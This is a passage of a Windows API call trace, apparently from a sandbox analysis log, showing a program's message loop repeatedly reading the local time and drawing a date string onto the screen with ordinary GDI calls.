lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.203] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.203] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.203] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3b0)) [0121.203] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3b0)) [0121.203] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.213] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.213] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.213] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3ba)) [0121.213] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3ba)) [0121.213] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.233] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.233] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.233] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3ce)) [0121.233] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3ce)) [0121.233] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.255] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.255] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.255] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3e4)) [0121.255] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3e4)) [0121.255] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.266] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.266] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.266] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x7)) [0121.266] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x7)) [0121.266] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0121.266] GetDC (hWnd=0x0) returned 0xa0100d0 [0121.266] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0121.267] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0121.267] GetSysColor (nIndex=8) returned 0x0 [0121.267] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0121.267] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0121.267] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0121.267] UnrealizeObject (h=0x2d10099f) returned 1 [0121.267] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0121.267] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0121.267] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0121.267] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:51 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:51 PM", lprc=0x19f5bd) returned 13 [0121.268] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0121.268] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0121.268] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0121.268] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0121.268] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0121.268] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.277] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.277] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.277] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x12)) [0121.277] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x12)) [0121.277] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.299] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.299] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.299] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x28)) [0121.299] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x28)) [0121.299] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.309] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.309] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.309] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x32)) [0121.309] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x32)) [0121.309] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.330] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.330] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.330] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x47)) [0121.330] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x47)) [0121.330] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.340] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.340] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.340] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x51)) [0121.340] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x51)) [0121.340] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.363] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.363] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.363] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x68)) [0121.363] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x68)) [0121.363] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.373] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.373] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.373] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x72)) [0121.373] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x72)) [0121.373] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.394] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.394] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.394] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x87)) [0121.394] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x87)) [0121.394] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.406] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.406] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.406] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x93)) [0121.406] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x93)) [0121.406] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.417] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.417] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.417] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x9e)) [0121.417] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x9e)) [0121.417] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.438] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.438] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.438] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xb3)) [0121.438] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xb3)) [0121.438] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.449] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.449] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.449] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xbe)) [0121.449] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xbe)) [0121.449] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.463] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.463] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.463] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xcc)) [0121.463] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xcc)) [0121.463] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.484] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.484] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.484] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xe1)) [0121.484] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xe1)) [0121.484] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.498] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.498] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.498] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xef)) [0121.498] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0xef)) [0121.498] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.523] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.523] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.523] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x108)) [0121.523] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x108)) [0121.523] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.533] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.533] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.533] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x112)) [0121.533] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x112)) [0121.533] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.544] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.544] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.544] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x11d)) [0121.544] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x11d)) [0121.544] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.564] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.564] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.564] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x131)) [0121.564] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x131)) [0121.564] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.577] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.577] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.577] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x13e)) [0121.577] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x13e)) [0121.577] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.598] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.598] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.598] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x153)) [0121.598] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x153)) [0121.598] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.608] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.608] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.608] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x15d)) [0121.608] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x15d)) [0121.608] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.629] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.629] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.629] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x172)) [0121.629] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x172)) [0121.629] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.639] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.639] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.639] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x17c)) [0121.639] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x17c)) [0121.639] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.661] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.661] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.661] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x192)) [0121.661] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x192)) [0121.661] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.671] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.671] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.671] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x19c)) [0121.671] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x19c)) [0121.671] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.682] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.682] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.682] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1a7)) [0121.682] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1a7)) [0121.682] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.703] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.703] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.703] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1bc)) [0121.703] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x33, wMilliseconds=0x1bc)) [0121.703] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0125.312] TranslateMessage (lpMsg=0x2347a14) returned 0 [0125.312] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0125.312] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x35)) [0125.314] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x37)) [0125.314] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0125.314] GetDC (hWnd=0x0) returned 0xa0100d0 [0125.316] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0125.316] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0125.316] GetSysColor (nIndex=8) returned 0x0 [0125.317] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0125.317] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0125.317] SetROP2 